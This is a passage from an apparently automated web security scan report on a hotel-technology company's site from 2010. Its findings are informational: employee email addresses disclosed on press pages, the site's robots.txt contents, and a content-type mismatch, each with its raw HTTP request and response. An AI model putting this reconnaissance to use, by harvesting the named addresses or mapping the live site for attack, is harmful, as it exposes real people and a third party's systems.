Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/preferred-hotel-group-selects-sabre-hospitality-solutions-as-global-marketing-and-distribution-provider HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:06:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24571


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:ndibenedetto@preferredhotelgroup.com" target="_blank">ndibenedetto@preferredhotelgroup.com</a>
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.15. http://www.sabrehospitality.com/press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions

Issue detail

The following email address was disclosed in the response:

Request

GET /press/prestigious-langham-hotels-international-to-switch-to-sabre-hospitality-solutions-for-its-comprehensive-distrubution-solutions HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:49:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23719


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.16. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology

Issue detail

The following email address was disclosed in the response:

Request

GET /press/sabre-hospitality-solutions-and-carlson-hotels-improve-agency-booking-process-using-new-direct-connect-technology HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:35:20 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23539


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.17. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results

Issue detail

The following email address was disclosed in the response:

Request

GET /press/sabre-hospitality-solutions-becomes-the-provider-of-choice-for-hotel-chains-seeking-experience-and-results HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:34:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22357


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.18. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results

Issue detail

The following email address was disclosed in the response:

Request

GET /press/sabre-hospitality-solutions-innovative-web-site-designs-earn-dozens-of-awards-while-ensuring-results HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:04:11 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27962


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.19. http://www.sabrehospitality.com/press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research

Issue detail

The following email address was disclosed in the response:

Request

GET /press/sabre-hospitality-solutions-renews-partnership-with-cornell-center-for-hospitality-research HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:39:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20679


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com" target="_blank">Carol.levitt@sabre.com</a>
...[SNIP]...
7.20. http://www.sabrehospitality.com/press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states

Issue detail

The following email address was disclosed in the response:

Request

GET /press/sabre-president-tapped-by-us-commerce-secretary-to-encourage-tourism-to-the-united-states HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:26:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22930


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<br />Nancy.st.pierre@sabre.com</p>
...[SNIP]...
7.21. http://www.sabrehospitality.com/press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth

Issue detail

The following email address was disclosed in the response:

Request

GET /press/shangri-la-hotels-and-resorts-renews-distribution-agreement-with-sabre-hospitality-solutions-following-significant-revenue-and-booking-growth HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:31:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24459


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.22. http://www.sabrehospitality.com/press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/uk-based-hotel-group-increases-bookings-and-avergae-rate-using-sabre-hospitality-solutions-reservations-technology HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/rss.php?type=2&FID=567&refpage=hospitality-industry-news.php
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:40:11 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25793


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<strong>www.redcarnation.com| book@rchmail.com</strong>
...[SNIP]...
<a href="mailto:Carol.levitt@sabre.com">Carol.levitt@sabre.com</a>
...[SNIP]...
7.23. http://www.sabrehospitality.com/privacy-policy.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /privacy-policy.php

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy-policy.php HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:13:51 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19854


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- cmt id="me
...[SNIP]...
<a href="mailto:privacy@sabre.com">privacy@sabre.com</a>
...[SNIP]...
8. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /css/rss.xsl

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.sabrehospitality.com

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 07 Jun 2010 21:32:50 GMT
ETag: "cd4018-db-6a22e480"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: *.swf
Disallow: /direct/request-process.php

User-agent: msnbot/2.0b
User-agent: msnbot/1.1

Disallow: *?m=

Sitemap: http://www.sabrehospitality.com/sabre-hospitali
...[SNIP]...
9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabrehospitality.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /robots.txt HTTP/1.1
Host: www.sabrehospitality.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=15aeh7jqftsomf9b96jlke5o36;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:16:49 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 07 Jun 2010 21:32:50 GMT
ETag: "cd4018-db-6a22e480"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: *.swf
Disallow: /direct/request-process.php

User-agent: msnbot/2.0b
User-agent: msnbot/1.1

Disallow: *?m=

Sitemap: http://www.sabrehospitality.com/sabre-hospitali
...[SNIP]...
Report generated by XSS.CX at Tue Oct 05 16:25:59 EDT 2010.